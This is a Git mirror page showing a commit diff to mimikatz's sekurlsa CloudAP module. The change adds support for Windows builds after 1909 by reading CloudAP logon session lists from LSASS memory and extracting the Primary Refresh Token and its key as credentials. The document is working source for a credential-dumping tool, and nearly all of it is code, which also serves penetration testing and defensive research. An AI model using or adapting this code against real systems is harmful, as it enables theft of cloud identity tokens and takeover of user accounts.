RepoMirrors
/
mimikatz
mirror of https://github.com/gentilkiwi/mimikatz
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #400 from dmb2168/master 

cloudap support for versions > 1909
This commit is contained in:
Benjamin DELPY 2022-07-29 21:34:40 +02:00 committed by GitHub
parent f6024687f0 da34c29e45
commit a2271237d1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 83 additions and 25 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

92
mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c
View File

@ -29,45 +29,89 @@ NTSTATUS kuhl_m_sekurlsa_cloudap(int argc, wchar_t * argv[])
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_cloudap(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
KIWI_CLOUDAP_LOGON_LIST_ENTRY logon;
KIWI_CLOUDAP_CACHE_LIST_ENTRY cache;
KIWI_CLOUDAP_CACHE_UNK unk;
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, pData->cLsass->hLsassMem};
KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0};
if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL))
{
aLsassMemory.address = CloudApGlobalLogonSessionList;
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
if (pData->cLsass->osContext.BuildNumber > KULL_M_WIN_BUILD_10_1909)
{
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY)))
KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2 logon;
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2, LocallyUniqueIdentifier), pData->LogonId))
{
if(logon.cacheEntry)
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2)))
{
aLocalMemory.address = &cache;
aLsassMemory.address = logon.cacheEntry;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY)))
if(logon.cacheEntry)
{
kprintf(L"\n\t Cachedir : %s", cache.toname);
if(cache.cbPRT && cache.PRT)
aLocalMemory.address = &cache;
aLsassMemory.address = logon.cacheEntry;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY)))
{
creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT;
creds.UserName.Buffer = (PWSTR) cache.PRT;
}
if(cache.toDetermine)
{
aLocalMemory.address = &unk;
aLsassMemory.address = cache.toDetermine;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK)))
kprintf(L"\n\t Cachedir : %s", cache.toname);
if(cache.cbPRT && cache.PRT)
{
kprintf(L"\n\t Key GUID : ");
kull_m_string_displayGUID(&unk.guid);
creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize;
creds.Password.Buffer = (PWSTR) unk.unk;
creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT;
creds.UserName.Buffer = (PWSTR) cache.PRT;
}
if(cache.toDetermine)
{
aLocalMemory.address = &unk;
aLsassMemory.address = cache.toDetermine;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK)))
{
kprintf(L"\n\t Key GUID : ");
kull_m_string_displayGUID(&unk.guid);
creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize;
creds.Password.Buffer = (PWSTR) unk.unk;
}
}
kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT);
}
}
}
}
}
else
{
KIWI_CLOUDAP_LOGON_LIST_ENTRY logon;
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
{
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY)))
{
if(logon.cacheEntry)
{
aLocalMemory.address = &cache;
aLsassMemory.address = logon.cacheEntry;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY)))
{
kprintf(L"\n\t Cachedir : %s", cache.toname);
if(cache.cbPRT && cache.PRT)
{
creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT;
creds.UserName.Buffer = (PWSTR) cache.PRT;
}
if(cache.toDetermine)
{
aLocalMemory.address = &unk;
aLsassMemory.address = cache.toDetermine;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK)))
{
kprintf(L"\n\t Key GUID : ");
kull_m_string_displayGUID(&unk.guid);
creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize;
creds.Password.Buffer = (PWSTR) unk.unk;
}
}
kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT);
}
kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT);
}
}
}

16
mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h
View File

@ -90,4 +90,18 @@ typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 {
DWORD unk6;
PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
// ...
} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11;
} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11;
typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2 {
struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY* Flink;
struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY* Blink;
DWORD unk0;
DWORD unk1;
DWORD unk2;
LUID LocallyUniqueIdentifier;
DWORD unk3;
DWORD64 unk4;
DWORD64 unk5;
PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
// ...
} KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2, * PKIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2;